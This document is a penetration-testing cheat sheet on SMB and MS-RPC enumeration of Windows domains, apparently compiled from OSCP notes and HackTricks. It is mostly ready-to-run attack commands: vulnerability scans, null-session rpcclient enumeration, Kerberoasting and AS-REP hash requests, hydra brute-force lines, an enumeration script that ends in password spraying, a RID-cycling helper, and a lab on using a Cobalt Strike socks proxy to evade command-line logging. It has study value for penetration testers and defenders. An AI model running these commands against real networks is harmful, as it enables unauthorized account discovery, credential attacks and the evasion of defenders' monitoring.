rpcclient and SMB enumeration cheat sheet

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester.

This page brings together notes on enumerating Windows domains over SMB and MS-RPC with rpcclient, smbclient, smbmap, crackmapexec, nmap and Impacket. The material comes from the Samba rpcclient documentation, the HackTricks page "139,445 - Pentesting SMB", an OSCP enumeration cheat sheet ("This is an enumeration cheat sheet that I created while pursuing the OSCP"), an SMB enumeration checklist ("With some input from the NetSecFocus group, I'm building out an SMB enumeration check list here"), the carnal0wnage rpcclient notes and the lab "Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging".

SMB basics

SMB allows you to share your resources with other computers over the network. NetBIOS uses ports 137, 138 and 139; port 445 is SMB over IP. SMB1 is the version susceptible to known attacks (EternalBlue, WannaCry) and is disabled by default in newer Windows versions; SMB2 reduced the "chattiness" of SMB1. Windows NT, 2000 and XP (mostly SMB1 hosts) are exposed in another way: null sessions can be created by default, so most of the enumeration below works on them without credentials.

Port and version scanning

  nmap -Pn -T4 -sS -p139,445 $IP

Vulnerability scripts (specific, then less specific):

  nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
  nmap --script smb-vuln* -Pn -p 139,445 {IP}

Metasploit, consoleless (SMB/SMB2 139/445 enumeration without the need to run msfconsole interactively; sourced from https://github.com/carlospolop/legion):

  msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'

Once a version is known, search for a matching exploit inside msfconsole, for example:

  search type:exploit platform:windows target:2008 smb

Through a pivot (see the socks proxy lab below) use a connect scan and skip host discovery:

  proxychains nmap -sTV -n -PN -p 80,22 target-ip -vv

NetBIOS name lookup prints "Looking up status of [ip]" followed by entries such as "[hostname] <00> - M" and "WORKGROUP <00> - M"; "Host is up (0.030s latency)" is the nmap report header for the same host.

Grabbing the Samba version off the wire

A Samba build string is visible in the negotiation traffic. ngrep is a neat tool to grep on network data; run something like

  ngrep -i -d tap0 's.?a.?m.?b.?a.'

in one terminal while you list the target's shares with smbclient in another (you can equally fire up wireshark and watch the same exchange). The same trick as a small script, reconstructed here from the fragments on the page (RHOST as $1, optional RPORT as $2; the original grep pattern after 'UnixSamba' is truncated on the page and completed with '.*'):

  #!/bin/sh
  # Listens for the first 7 packets of a null login and grabs the SMB version.
  # Will sometimes not capture or will print multiple lines.
  # May need to run a second time for success.
  if [ -z "$1" ]; then echo "Usage: $0 RHOST {RPORT}" && exit 1; else rhost=$1; fi
  if [ ! -z "$2" ]; then rport=$2; else rport=139; fi
  tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*' &
  echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
  sleep 1

Shares and access

It is always recommended to look if you can access anything; if you don't have credentials, try a null session and the guest account before anything else. These are the commands one cheat sheet author runs in order every time they see an open SMB port:

  smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
  crackmapexec smb {IP} --pass-pol -u "" -p ""
  crackmapexec smb {IP} --pass-pol -u "guest" -p ""
  GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
  GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
  GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"

and, with credentials:

  smbmap -H {IP} -u {Username} -p {Password}
  smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
  smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
  crackmapexec smb {IP} -u {Username} -p {Password} --shares
  GetADUsers.py {Domain_Name}/{Username}:{Password} -all
  GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
  GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

An NT hash can be used in place of a password with --pw-nt-hash, e.g. -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash. If you omit the password on the command line it will be prompted for; for a null session leave it blank and press enter.

smbmap -H [ip/hostname] shows what you can do with the given credentials (or with a null session if no credentials are given). Typical output:

  [+] Finding open SMB ports....
  [+] IP: [ip]:445  Name: [ip]
      Disk          Permissions       Comment
      ----          -----------       -------
      IPC$          NO ACCESS         Remote IPC
      NETLOGON      READ ONLY
      Replication   READ ONLY
      SYSVOL        NO ACCESS
      [share]       READ/WRITE        (reported as "Current user access: READ/WRITE")

When enumerating shares manually with a valid session, watch the error codes: NT_STATUS_ACCESS_DENIED means the share exists but you are not allowed in, while NT_STATUS_BAD_NETWORK_NAME means there is no share by that name. Shares can also be browsed from a file browser window (nautilus, thunar, etc.).

rpcclient

rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself and is part of the Samba suite on Linux distributions. There are multiple methods to connect to a remote RPC service; running rpcclient with no options prints the usage, and the relevant options are:

  -U, --user=USERNAME            Set the network username (use -U "" for a null session)
  -N, --no-pass                  Don't ask for a password
  -k, --kerberos                 Use kerberos (active directory)
  -W, --workgroup=WORKGROUP      Set the workgroup name
  -s, --configfile=CONFIGFILE    Use alternative configuration file
  --pw-nt-hash                   The password is an NT hash
  -c, --command=COMMANDS         Execute semicolon separated commands and exit

The help also lists the pipe protection modes, among them "none: force RPC pipe connections to have no special properties", and notes that using the stored machine account password "assumes a valid machine account to this domain controller".

Connect with a null session (you will be asked for a password; leave it blank and press enter to continue, or pass -N):

  rpcclient -U "" -N [ip]

Once connected you get another set of options, the rpcclient commands. The ones used in this cheat sheet, grouped as in the help output:

  Server and domain
    srvinfo              Server query info
    enumdomains          Enumerate domains
    querydominfo         Query domain info
    getdompwinfo         Retrieve domain password info
    logonctrl2           Logon Control 2
  Users and groups (SAMR)
    enumdomusers         Enumerate domain users
    querydispinfo        Query display info
    queryusergroups      Query user groups
    getusrdompwinfo      Retrieve user domain password info
    deletedomuser        Delete domain user
    enumdomgroups        Enumerate domain groups
    enumalsgroups        Enumerate alias groups
    queryaliasmem        Query alias membership
    lookupsids           Convert SIDs to names
    lookupnames          Convert names to SIDs
  Privileges (LSARPC)
    enumprivs            Enumerate privileges
    getdispname          Get the privilege name
    lsaenumprivsaccount  Enumerate the privileges of an SID
    lsaenumacctrights    Enumerate the rights of an SID
  Printing (SPOOLSS)
    enumjobs             Enumerate print jobs
    enumforms            Enumerate forms
    getform              Get form
    deleteform           Delete form
    adddriver            Add a print driver
    deldriver            Delete a printer driver
    getdriverdir         Get print driver upload directory
    enumkey              Enumerate printer keys
  DFS and shutdown
    dfsexist             Query DFS support
    dfsadd               Add a DFS share
    shutdownabort        Abort Shutdown (over shutdown pipe)

Users, groups and SIDs

You can use enumdomusers and querydispinfo to query user information: enumdomusers lists each user with its RID (the RID is printed in hexadecimal), and querydispinfo elaborates on that with full names and descriptions. This information should already have been gathered by enum4linux or enum4linux-ng, but rpcclient lets you follow up on it. enumdomgroups lists domain groups with their RIDs; the group name and RID extracted from it are what you use to query group information and membership (querygroup and querygroupmem take the RID), and enumalsgroups / queryaliasmem do the same for aliases.

A SID is the identifier Windows uses for a security principal: the domain SID followed by the principal's RID. lookupnames turns a name into a SID and lookupsids turns SIDs back into names, which is how you verify which RIDs are live (the domain SID from lookupnames plus a guessed RID). Example session from the carnal0wnage notes:

  rpcclient $> lookupnames lewis
  lewis S-1-5-21-1835020781-2383529660-3657267081-2002 (User: 1)
  rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002
  S-1-5-21-1835020781-2383529660-3657267081-2002 LEWISFAMILY\user (1)
  rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-501
  S-1-5-21-1835020781-2383529660-3657267081-501 LEWISFAMILY\unknown (1)
  rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013
  result was NT_STATUS_NONE_MAPPED
  rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2000
  result was NT_STATUS_NONE_MAPPED

The number in parentheses is the SID type (1 = user, 2 = domain group, 4 = alias); NT_STATUS_NONE_MAPPED means no account has that RID. Having a SID is also the prerequisite for the account and privilege operations below: an attacker can create an account object based on the SID of a user, and deletedomuser is the command used to delete a domain user.

Password policy and password attacks

To enumerate the password properties of the domain, use getdompwinfo. It is also possible to get the password properties of an individual user with getusrdompwinfo and the user's RID. Do this (or crackmapexec --pass-pol) before any brute force, because the lockout policy decides how many guesses per account are safe; the hydra lines below use -t 1 for that reason.

  hydra -l lewis -P common-passwords.txt 192.168.182.36 smb -V
  hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
  hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
  hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1     (every enumerated user with 'password', blank and the username as password)
  nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv

Privileges

Enumerate the privileges assigned to an account by its SID: first resolve the SID with lookupnames, then run lsaenumacctrights on it. Output looks like:

  rpcclient $> lookupnames lewis
  lewis S-1-5-21-1835020781-2383529660-3657267081-2002 (User: 1)
  rpcclient $> lsaenumacctrights S-1-5-21-1835020781-2383529660-3657267081-2002
  found 5 privileges
  SeMachineAccountPrivilege 0:6 (0x0:0x6)
  ...

These privileges help the attacker plan for elevating privileges on the domain. With sufficient rights it is also possible to manipulate the privileges of that SID, either granting a particular privilege or removing a privilege from a user altogether; enumprivs lists the privileges known to the LSA and getdispname returns the display name of one.

Impacket equivalents

  /usr/share/doc/python3-impacket/examples/samrdump.py   (SAMR user enumeration)
  /usr/share/doc/python3-impacket/examples/rpcdump.py    (list the RPC endpoints exposed by the host)

Putting it together: smbenum

A script that enumerates SMB using every tool in the arsenal (reconstructed from the fragments on this page; the NetBIOS step's command did not survive and is filled with nmblookup):

  #!/bin/bash
  # smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal
  if [ -z "$1" ]; then echo "Usage: $0 IP"; exit 1; fi
  IP=$1

  echo -e "\n########## Getting Netbios name ##########"
  nmblookup -A $IP

  echo -e "\n########## Checking for NULL sessions ##########"
  output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`
  echo "$output"

  echo -e "\n########## Enumerating domains ##########"
  bash -c "echo 'enumdomains' | rpcclient $IP -U%"

  echo -e "\n########## Enumerating password and lockout policies ##########"
  bash -c "echo 'getdompwinfo' | rpcclient $IP -U%"

  echo -e "\n########## Enumerating users ##########"
  nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP
  bash -c "echo 'enumdomusers' | rpcclient $IP -U%"
  bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt

  echo -e "\n########## Enumerating Administrators ##########"
  net rpc group members "Administrators" -I $IP -U%

  echo -e "\n########## Enumerating Domain Admins ##########"
  net rpc group members "Domain Admins" -I $IP -U%

  echo -e "\n########## Enumerating groups ##########"
  nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP

  echo -e "\n########## Enumerating shares ##########"
  nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP

  echo -e "\n########## Bruteforcing all users with 'password', blank and username as password ##########"
  hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1
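The enumdomusers / lookupnames / lookupsids workflow above is easy to do by hand for one user and tedious for a domain. The following is an added example, not code from the page or from the Samba project: it parses the rpcclient output formats shown in this cheat sheet, derives the domain SID from a lookupnames line, builds the lookupsids batches that rpcclient -c can run (including a RID-cycling range for RIDs enumdomusers may not show), and classifies the answers by SID type. The sample outputs are constructed in the formats rpcclient prints, not captured from a real host; the RID range and batch size are arbitrary choices.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample output in rpcclient's formats (not captured from a real host).
ENUMDOMUSERS = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[lewis] rid:[0x7d2]
"""
ENUMDOMGROUPS = """\
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
"""
LOOKUPNAMES = "lewis S-1-5-21-1835020781-2383529660-3657267081-2002 (User: 1)\n"
LOOKUPSIDS = """\
S-1-5-21-1835020781-2383529660-3657267081-2002 LEWISFAMILY\\user (1)
S-1-5-21-1835020781-2383529660-3657267081-501 LEWISFAMILY\\unknown (1)
S-1-5-21-1835020781-2383529660-3657267081-512 LEWISFAMILY\\Domain Admins (2)
result was NT_STATUS_NONE_MAPPED
"""

# SID_NAME_USE values printed in parentheses by lookupsids/lookupnames.
SID_TYPES = {1: "User", 2: "Group", 3: "Domain", 4: "Alias", 5: "WellKnownGroup",
             6: "DeletedAccount", 7: "Invalid", 8: "Unknown", 9: "Computer"}

_RID_LINE = re.compile(r"^(user|group):\[(.*?)\] rid:\[(0x[0-9a-fA-F]+)\]$")
_DOMAIN_SID = re.compile(r"(S-1-5-21(?:-\d+){3})-\d+")
_MAPPED = re.compile(r"^(S-1-5-21(?:-\d+){4}) ([^\\]+)\\(.+) \((\d+)\)$")


def parse_rid_listing(text: str) -> List[Tuple[str, str, int]]:
    """enumdomusers/enumdomgroups lines -> (kind, name, rid); RIDs are hex on the wire."""
    out = []
    for line in text.splitlines():
        m = _RID_LINE.match(line.strip())
        if m:
            out.append((m.group(1), m.group(2), int(m.group(3), 16)))
    return out


def domain_sid_from_lookupnames(text: str) -> str:
    """Drop the trailing RID of the first account SID in lookupnames output."""
    m = _DOMAIN_SID.search(text)
    if not m:
        raise ValueError("no S-1-5-21 domain SID found in lookupnames output")
    return m.group(1)


def lookupsids_batches(domain_sid: str, rids: List[int], chunk: int = 20) -> List[str]:
    """Build 'lookupsids ...' commands; lookupsids accepts several SIDs per call."""
    sids = [f"{domain_sid}-{rid}" for rid in rids]
    return ["lookupsids " + " ".join(sids[i:i + chunk]) for i in range(0, len(sids), chunk)]


def rid_cycle_rids(known: List[int], lo: int = 500, hi: int = 1100) -> List[int]:
    """RIDs to probe: the built-in/low range plus anything enumdomusers already showed."""
    return sorted(set(range(lo, hi + 1)) | set(known))


def rpcclient_argv(target: str, commands: List[str], user: str = "") -> List[str]:
    """argv for a null-session rpcclient run (-U "" -N) executing the commands in one go."""
    return ["rpcclient", "-U", user, "-N", target, "-c", "; ".join(commands)]


def parse_lookupsids(text: str) -> Tuple[Dict[str, Tuple[str, str, str]], int]:
    """Map SID -> (domain, name, type name); count NT_STATUS_NONE_MAPPED answers."""
    mapped: Dict[str, Tuple[str, str, str]] = {}
    none_mapped = 0
    for line in text.splitlines():
        line = line.strip()
        m = _MAPPED.match(line)
        if m:
            sid, dom, name, kind = m.groups()
            mapped[sid] = (dom, name, SID_TYPES.get(int(kind), f"type{kind}"))
        elif "NT_STATUS_NONE_MAPPED" in line:
            none_mapped += 1
    return mapped, none_mapped


def live_accounts(text: str) -> Dict[str, List[str]]:
    """Group resolved names by type so users and groups can be fed to later steps."""
    grouped: Dict[str, List[str]] = {}
    for dom, name, kind in parse_lookupsids(text)[0].values():
        grouped.setdefault(kind, []).append(f"{dom}\\{name}")
    return grouped


if __name__ == "__main__":
    users = parse_rid_listing(ENUMDOMUSERS)
    domain = domain_sid_from_lookupnames(LOOKUPNAMES)
    rids = rid_cycle_rids([rid for _, _, rid in users])
    for cmd in lookupsids_batches(domain, rids, chunk=50):
        print(" ".join(rpcclient_argv("[ip]", [cmd])))
    print(live_accounts(LOOKUPSIDS))
```

Feed the printed rpcclient lines through proxychains when working behind a socks pivot; the parser does not care where the output came from, only that it is the text rpcclient prints.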
Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging (Defense Evasion)

This lab shows how it is possible to bypass command-line argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post-exploitation tool that supports socks proxying). The idea is that the domain is enumerated from the attacker's own machine with rpcclient, using some discovered credentials, instead of with the built-in commands (net user /domain and the like) run on the compromised host, whose command lines are most likely monitored by the blue team. The approach came out of the author's offensive security research.

  First - the attacker has code execution on a target system and the beacon is calling back to the team server (in the lab, PID 260, a beacon injected into a dllhost process).
  Second - the attacker opens a socks4 proxy on port 7777 on their local kali machine (10.0.0.5) from the beacon.

This means that the attacker can now use proxychains to proxy traffic from their kali box through the beacon to the target (attacker ---> beacon ---> end target), for example

  proxychains nmap -sTV -n -PN -p 80,22 target-ip -vv
  proxychains rpcclient -U 'domain\user' target-ip

and then run enumdomusers, enumdomgroups, querydispinfo, lookupsids and the rest of the commands above. On the target only the resulting SMB/RPC traffic is visible; no batch, VBScript or PowerShell command line is written to the host's process or command-line logs.

References

  https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html
  https://github.com/SecureAuthCorp/impacket/tree/master/examples
  https://www.cobaltstrike.com/help-socks-proxy-pivoting
  https://book.hacktricks.xyz/pentesting/pentesting-smb
  https://github.com/carlospolop/legion
  Enumerating Active Directory Using RPCClient - YouTube: https://www.youtube.com/watch?v=l8nkXCOYQC4&index=19&list=WL&t=7s
  Enumerating user accounts on Linux and OS X with rpcclient; Hacking Samba on Ubuntu and Installing the Meterpreter (carnal0wnage)
  OSCP Enumeration Cheatsheet - CertCube Labs; oncybersec/oscp-enumeration-cheat-sheet - GitHub